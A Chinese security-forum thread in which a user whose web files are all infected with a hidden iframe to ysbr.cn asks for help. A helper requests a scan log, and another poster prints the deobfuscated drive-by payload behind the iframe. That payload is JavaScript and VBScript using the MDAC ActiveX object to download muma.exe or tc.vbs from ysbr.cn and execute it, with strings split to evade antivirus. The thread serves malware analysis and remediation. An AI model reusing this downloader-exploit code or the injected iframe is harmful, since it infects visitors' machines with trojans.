瑞星卡卡安全论坛

我电脑里的ASP、HTM、PHP等网站文件最后全部都被加上了一句<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>，全部删除后重新启动计算机还是照样出现，用了很多垃圾软件清理软件都不起作用。一旦打开这些ASP，JSP等类型的文件，就会上里面那个地方下载一堆病毒木马之类的，
请求帮助，把所有ASP，JSP，HTML等恢复原来的样子吧

救命啊~~~

请下载SREng2（最新版） ，使用“智能扫描”，按下“扫描”按钮进行扫描，
扫描完成后按下“保存报告”按钮保存报告日志文件（SREng.LOG），把保存的报告
日志文件内容复制-粘贴上来,,日志一次粘不完，分次粘完，请不要修改。

下载地址
http://www.kztechs.com/sreng/sreng2.zip

<script>var url,path;url="http://www.ysbr.cn/muma.exe";path="C:\\tcsafe.exe";try{var ado=(document.createElement("object"));var b1="classid";var b2="clsid:";var b3="BD96C556-";var b4="65A3-11D0-983A-00C04FC29E36";ado.setAttribute(b1,b2+b3+b4);var a1="Microsoft";var a2=".XMLHTTP";var xml=ado.CreateObject(a1+a2,"");var ab="Adodb.";var cd="Stream";var as=ado.createobject(ab+cd,"");var a3="G";var a4="E";var a5="T";xml.Open(a3+a4+a5,url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);as.savetofile(path,2);as.close();var b5="Shell.";var b6="Application";var shell=ado.createobject(b5+b6,"");var c1="o";var c2="p";var c3="e";var c4="n";shell.Shell(pa222th,"","",c1+c2+c3+c4,0);}catch(e){};</script><html>
<script language="VBScript">
    on error resume next
    tcsafe = "http://www.ysbr.cn/333/tc.vbs"
    Ftccnyt="o"&"b"&"j"&"e"&"ct"
    Ktccnyt="c"&"l"&"a"&"s"&"s"&"i"&"d"
    t1="clsid:":t2="BD96C556-":t3="65A3-":t4="11D0-":t5="983A-":t6="00C04FC29E36"
    Ttccnyt=t1&t2&t3&t4&t5&t6
    Mtccnyt="M"&"i"&"cr"&"os"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"HTTP"
  Vtccnyt="S"&"he"&"l"&"l"&"."&"A"&"pp"&"l"&"i"&"c"&"a"&"t"&"i"&"on"
Wtccnyt="S"&"c"&"r"&"ip"&"ti"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"ys"&"t"&"em"&"O"&"b"&"j"&"ec"&"t"
    sub tcsafe1exe(Vtccnyt,tcsafe9)
    set tcsafee = tcsafec.createobject(Vtccnyt,"")
    dd ="o"&"p"&"e"&"n"
    tcsafee.ShellExecute tcsafe9,BBS,BBS,dd,0
    end sub
    Set tcsafec = document.createElement(Ftccnyt)
    tcsafec.setAttribute Ktccnyt, Ttccnyt
    tcsafei=Mtccnyt
    Set tcsafed = tcsafec.CreateObject(tcsafei,"")
    tcsaff="A"&"d"&"o"
    tcsafg="d"&"b"&"."
    tcsafh="S"&"t"&"r"
    tcsafi="e"&"a"&"m"
    tcsafef=tcsaff&tcsafg&tcsafh&tcsafi
    tcsafeg=tcsafef
    set tcsafea = tcsafec.createobject(tcsafeg,"")
    tcsafea.type = 1
    tcsafeh="G"&"E"&"T"
    tcsafed.Open tcsafeh, tcsafe, False
    tcsafed.Send
    tcsafe9="tc.vbs"
    set tcsafeb = tcsafec.createobject(Wtccnyt,"")
    set tcsafee = tcsafeb.GetSpecialFolder(2)
    tcsafea.open
    tcsafe8="tcsafea.BuildPath(tcsafea,tcsafe8)"
    tcsafe7="gudanjimob.BuildPath(gudanjimob,tcsafe7)"
    tcsafe6="tcsafec"&"."&"B"&"u"&"i"&"l"&"dP"&"a"&"t"&"h(tcsafed,tcsafe6)"
    tcsafe5="tcsafed"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"at"&"h(tcsafef,tcsafe5)"
    tcsafe4="tcsafee"&"."&"Bu"&"i"&"l"&"d"&"P"&"a"&"t"&"h(tcsafeg,tcsafe4)"
    tcsafe3="tcsafef"&"."&"B"&"u"&"i"&"l"&"d"&"Pa"&"t"&"h(tcsafeh,tcsafe4)"
    tcsafe2="tcsafeg"&"."&"B"&"u"&"il"&"d"&"P"&"a"&"t"&"h(tcsafei,tcsafe3)"
    tcsafe1="tcsafeh"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"a"&"t"&"h(tcsafeg,tcsafe1)"
    tcsafe0="tcsafei"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"at"&"h(tcsafek,tcsafe0)"
    tcsafe9= tcsafeb.BuildPath(tcsafee,tcsafe9)
    tcsafea.write tcsafed.responseBody
    tcsafea.savetofile tcsafe9,2
    tcsafea.close
    call tcsafe1exe(Vtccnyt,tcsafe9)
</script>


没事干，就把他还原了一下，还是为了躲瑞星做的一个措施！
预防：打齐补丁

解决的办法还得扫LOG上来！！

多谢多谢，我试一下
刚才查了一下，好像是叫熊猫烧香的病毒

单就那个muma.exe的话，不是熊猫，但你鸡子里是不是，要扫个LOG上来看看